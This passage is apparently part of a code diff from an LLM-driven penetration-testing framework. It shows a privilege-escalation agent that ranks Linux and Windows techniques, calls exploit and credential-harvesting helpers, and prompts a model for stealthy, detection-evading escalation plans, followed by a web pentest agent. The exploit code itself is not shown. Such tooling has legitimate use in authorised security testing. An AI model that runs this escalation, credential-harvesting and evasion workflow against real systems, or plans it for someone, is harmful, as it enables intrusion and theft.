def _identify_escalation_paths(self, system_info: Dict) -> List[Dict]:
"""Identify possible privilege escalation paths"""
paths = []
os_type = system_info.get("os")
if os_type == "linux":
# SUID exploitation
for binary in system_info.get("suid_binaries", []):
paths.append({
"technique": "suid_exploitation",
"target": binary,
"difficulty": "medium",
"likelihood": 0.6
})
# Sudo exploitation
for permission in system_info.get("sudo_permissions", []):
paths.append({
"technique": "sudo_exploitation",
"target": permission,
"difficulty": "low",
"likelihood": 0.8
})
# Kernel exploitation
if system_info.get("kernel_version"):
paths.append({
"technique": "kernel_exploit",
"target": system_info["kernel_version"],
"difficulty": "high",
"likelihood": 0.4
})
# Writable path exploitation
for path in system_info.get("writable_paths", []):
if "bin" in path or "sbin" in path:
paths.append({
"technique": "path_hijacking",
"target": path,
"difficulty": "medium",
"likelihood": 0.5
})
elif os_type == "windows":
# Service exploitation
for service in system_info.get("services", []):
if service.get("unquoted_path") or service.get("weak_permissions"):
paths.append({
"technique": "service_exploitation",
"target": service,
"difficulty": "medium",
"likelihood": 0.7
})
# AlwaysInstallElevated
if system_info.get("always_install_elevated"):
paths.append({
"technique": "always_install_elevated",
"target": "MSI",
"difficulty": "low",
"likelihood": 0.9
})
# Token impersonation
paths.append({
"technique": "token_impersonation",
"target": "SeImpersonatePrivilege",
"difficulty": "medium",
"likelihood": 0.6
})
# Sort by likelihood
paths.sort(key=lambda x: x.get("likelihood", 0), reverse=True)
return paths
def _ai_escalation_strategy(self, system_info: Dict, escalation_paths: List[Dict]) -> Dict:
"""Use AI to optimize escalation strategy"""
prompt = self.llm.get_prompt(
"privesc",
"ai_escalation_strategy_user",
default=f"""
Analyze the system and recommend optimal privilege escalation strategy:
System Information:
{json.dumps(system_info, indent=2)}
Identified Escalation Paths:
{json.dumps(escalation_paths, indent=2)}
Provide:
1. Recommended escalation path (with justification)
2. Step-by-step execution plan
3. Required tools and commands
4. Detection likelihood and evasion techniques
5. Fallback options
6. Post-escalation actions
Response in JSON format with actionable recommendations.
"""
)
system_prompt = self.llm.get_prompt(
"privesc",
"ai_escalation_strategy_system",
default="""You are an expert in privilege escalation techniques.
Analyze systems and recommend the most effective, stealthy escalation paths.
Consider Windows, Linux, and Active Directory environments.
Prioritize reliability and minimal detection."""
)
try:
formatted_prompt = prompt.format(
system_info_json=json.dumps(system_info, indent=2),
escalation_paths_json=json.dumps(escalation_paths, indent=2)
)
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI escalation strategy error: {e}")
return {"error": str(e)}
def _attempt_escalation(self, path: Dict, system_info: Dict) -> Dict:
"""Attempt privilege escalation using specified path"""
technique = path.get("technique")
os_type = system_info.get("os")
result = {
"technique": technique,
"success": False,
"details": {}
}
try:
if os_type == "linux":
if technique == "suid_exploitation":
result = self.linux_privesc.exploit_suid(path.get("target"))
elif technique == "sudo_exploitation":
result = self.sudo_exploiter.exploit(path.get("target"))
elif technique == "kernel_exploit":
result = self.kernel_exploiter.exploit_linux(path.get("target"))
elif technique == "path_hijacking":
result = self.linux_privesc.exploit_path_hijacking(path.get("target"))
elif os_type == "windows":
if technique == "service_exploitation":
result = self.windows_privesc.exploit_service(path.get("target"))
elif technique == "always_install_elevated":
result = self.windows_privesc.exploit_msi()
elif technique == "token_impersonation":
result = self.windows_privesc.impersonate_token()
except Exception as e:
logger.error(f"Escalation error for {technique}: {e}")
result["error"] = str(e)
return result
def _harvest_credentials(self, system_info: Dict) -> List[Dict]:
"""Harvest credentials after privilege escalation"""
os_type = system_info.get("os")
if os_type == "linux":
return self.cred_harvester.harvest_linux()
elif os_type == "windows":
return self.cred_harvester.harvest_windows()
return []

120
agents/web_pentest_agent.py Normal file
View File

@@ -0,0 +1,120 @@
#!/usr/bin/env python3
"""
Web Pentest Agent - Specialized agent for web application penetration testing.
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
from tools.web_pentest import WebRecon # Import the moved WebRecon tool
logger = logging.getLogger(__name__)
class WebPentestAgent:
"""Agent responsible for comprehensive web application penetration testing."""
def __init__(self, config: Dict):
    """Set up the agent's LLM backend and web reconnaissance tooling.

    Args:
        config: Shared configuration dict passed through to every tool.
    """
    self.config = config
    self.llm = LLMManager(config)
    self.web_recon = WebRecon(config)
    # Web exploitation is not yet split into its own tool class; when it
    # is, wire it up here (e.g. self.web_exploiter = WebExploiter(config)).
    logger.info("WebPentestAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
    """Run the web-application pentest workflow against *target*.

    Phases: (1) WebRecon fingerprinting, (2) AI analysis of any findings
    recon reported, (3) exploitation — currently a placeholder.

    Args:
        target: URL/host to assess.
        context: Engagement context (currently unused by this phase).

    Returns:
        A report dict; ``status`` is ``"completed"`` or ``"error"`` (with
        the message under ``error``).
    """
    logger.info(f"Starting web pentest on {target}")
    report: Dict = {
        "target": target,
        "status": "running",
        "web_recon_results": {},
        "vulnerability_analysis": [],
        "exploitation_attempts": [],
        "ai_analysis": {}
    }
    try:
        # Phase 1: fingerprint the application surface.
        logger.info("Phase 1: Web Reconnaissance (WebPentestAgent)")
        recon_output = self.web_recon.analyze(target)
        report["web_recon_results"] = recon_output

        # Phase 2: hand whatever recon flagged to the LLM for triage.
        logger.info("Phase 2: AI-powered Vulnerability Analysis")
        findings = self._identify_potential_web_vulnerabilities(recon_output)
        if not findings:
            logger.info("No immediate web vulnerabilities identified by WebRecon.")
        else:
            report["vulnerability_analysis"] = findings
            report["ai_analysis"]["vulnerability_insights"] = (
                self._ai_analyze_web_vulnerabilities(findings, target)
            )

        # Phase 3: exploitation — to be integrated with exploit tooling.
        report["status"] = "completed"
        logger.info("Web pentest phase completed")
    except Exception as exc:
        logger.error(f"Error during web pentest: {exc}")
        report["status"] = "error"
        report["error"] = str(exc)
    return report
def _identify_potential_web_vulnerabilities(self, web_recon_output: Dict) -> List[Dict]:
"""
Identifies potential web vulnerabilities based on WebRecon output.
This is a placeholder and will be enhanced as WebRecon improves.
"""
vulnerabilities = []
if "vulnerabilities" in web_recon_output:
vulnerabilities.extend(web_recon_output["vulnerabilities"])
return vulnerabilities
def _ai_analyze_web_vulnerabilities(self, vulnerabilities: List[Dict], target: str) -> Dict:
"""Uses AI to analyze identified web vulnerabilities."""
prompt = self.llm.get_prompt(
"web_recon",
"ai_analysis_user",
default=f"""
Analyze the following potential web vulnerabilities identified on {target} and provide insights:
Vulnerabilities: {json.dumps(vulnerabilities, indent=2)}
Provide:
1. Prioritized list of vulnerabilities
2. Recommended exploitation steps for each (if applicable)
3. Potential impact
4. Remediation suggestions
Response in JSON format with actionable recommendations.
"""
)
system_prompt = self.llm.get_prompt(
"web_recon",
"ai_analysis_system",
default="""You are an expert web penetration tester and security analyst.
Provide precise analysis of web vulnerabilities and practical advice for exploitation and remediation."""
)
try:
# Format the user prompt with recon_data
formatted_prompt = prompt.format(
target=target,
vulnerabilities_json=json.dumps(vulnerabilities, indent=2)
)
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI web vulnerability analysis error: {e}")
return {"error": str(e), "raw_response": response if 'response' in locals() else None}